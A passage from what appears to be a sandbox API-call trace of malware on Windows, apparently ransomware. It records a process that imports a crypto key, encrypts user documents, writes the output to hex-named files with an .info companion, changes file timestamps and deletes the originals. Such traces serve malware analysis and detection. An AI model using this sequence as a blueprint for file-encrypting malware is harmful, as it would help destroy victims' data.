GetFileType (hFile=0x36c) returned 0x1 [0076.664] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.673] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.688] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.688] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.689] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.689] SetEndOfFile (hFile=0x36c) returned 1 [0076.690] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.690] CloseHandle (hObject=0x36c) returned 1 [0076.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.691] GetFileType (hFile=0x36c) returned 0x1 [0076.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.691] GetFileType (hFile=0x36c) returned 0x1 [0076.691] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.691] CloseHandle (hObject=0x36c) returned 1 [0076.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.691] GetFileType (hFile=0x36c) returned 0x1 [0076.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.691] GetFileType (hFile=0x36c) returned 0x1 [0076.691] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.691] CloseHandle (hObject=0x36c) returned 1 [0076.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.692] GetFileType (hFile=0x36c) returned 0x1 [0076.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.692] GetFileType (hFile=0x36c) returned 0x1 [0076.692] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.692] CloseHandle (hObject=0x36c) returned 1 [0076.692] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.692] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xth7srl5om21.doc")) returned 1 [0076.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\XTH7srL5Om21.doc", lpFilePart=0x0) returned 0x41 [0076.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", lpFilePart=0x0) returned 0x51 [0076.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c7068a852bc439c755a64820e756138"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.693] GetFileType (hFile=0x36c) returned 0x1 [0076.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.693] GetFileType (hFile=0x36c) returned 0x1 [0076.693] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.693] CloseHandle (hObject=0x36c) returned 1 [0076.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", lpFilePart=0x0) returned 0x51 [0076.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c7068a852bc439c755a64820e756138"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.694] GetFileType (hFile=0x36c) returned 0x1 [0076.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.694] GetFileType (hFile=0x36c) returned 0x1 [0076.694] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.694] CloseHandle (hObject=0x36c) returned 1 [0076.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138", lpFilePart=0x0) returned 0x51 [0076.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\4C7068A852BC439C755A64820E756138" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\4c7068a852bc439c755a64820e756138"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.694] GetFileType (hFile=0x36c) returned 0x1 [0076.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.694] GetFileType (hFile=0x36c) returned 0x1 [0076.694] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.697] CloseHandle (hObject=0x36c) returned 1 [0076.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.698] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x2281f60, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.698] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.698] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.698] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2282050, pdwDataLen=0x1bf5d230 | out: pbData=0x2282050*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.698] CryptImportKey (in: hProv=0x1a5b7910, pbData=0x2282170, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.698] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.698] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.698] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626fa0) returned 1 [0076.698] CryptContextAddRef (hProv=0x1a5b7910, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.698] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x4, pbData=0x22822b8*=0x1, dwFlags=0x0) returned 1 [0076.698] CryptSetKeyParam (hKey=0x1a626fa0, dwParam=0x1, pbData=0x2282268, dwFlags=0x0) returned 1 [0076.699] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.699] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", lpFilePart=0x0) returned 0x51 [0076.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\764a3b79ce8938c28e5e470560989124"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.699] ReadFile (in: hFile=0x36c, lpBuffer=0x2282688, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2282688*, lpNumberOfBytesRead=0x1bf5d128*=0x113ab, lpOverlapped=0x0) returned 1 [0076.701] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22966a0*, pdwDataLen=0x1bf5d180*=0x113a0, dwBufLen=0x113a0 | out: pbData=0x22966a0*, pdwDataLen=0x1bf5d180*=0x113a0) returned 1 [0076.704] ReadFile (in: hFile=0x36c, lpBuffer=0x2282688, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2282688*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.704] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22a7a80*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x22a7a80*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.704] CryptEncrypt (in: hKey=0x1a626fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22a7ad0*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x22a7ad0*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.704] WriteFile (in: hFile=0x3a4, lpBuffer=0x22a7b20*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x22a7b20*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.705] CloseHandle (hObject=0x3a4) returned 1 [0076.706] CloseHandle (hObject=0x36c) returned 1 [0076.707] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.707] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.707] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", lpFilePart=0x0) returned 0x51 [0076.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\764a3b79ce8938c28e5e470560989124"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.707] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.708] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.709] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.710] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.711] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.711] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.711] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.712] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.713] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.713] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x3b0, lpOverlapped=0x0) returned 1 [0076.713] ReadFile (in: hFile=0x36c, lpBuffer=0x22a9228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x22a9228*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124.info", lpFilePart=0x0) returned 0x56 [0076.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\764a3b79ce8938c28e5e470560989124.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.746] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5b8570, ftCreationTime.dwHighDateTime=0x1d4ccb2, ftLastAccessTime.dwLowDateTime=0x445d90d0, ftLastAccessTime.dwHighDateTime=0x1d4ce5d, ftLastWriteTime.dwLowDateTime=0x445d90d0, ftLastWriteTime.dwHighDateTime=0x1d4ce5d, nFileSizeHigh=0x0, nFileSizeLow=0x113ab)) returned 1 [0076.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.746] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.746] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", dwFileAttributes=0x80) returned 1 [0076.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.747] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x22bd4f0 | out: lpFileInformation=0x22bd4f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4f5b8570, ftCreationTime.dwHighDateTime=0x1d4ccb2, ftLastAccessTime.dwLowDateTime=0x445d90d0, ftLastAccessTime.dwHighDateTime=0x1d4ce5d, ftLastWriteTime.dwLowDateTime=0x445d90d0, ftLastWriteTime.dwHighDateTime=0x1d4ce5d, nFileSizeHigh=0x0, nFileSizeLow=0x113ab)) returned 1 [0076.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.747] SetThreadErrorMode 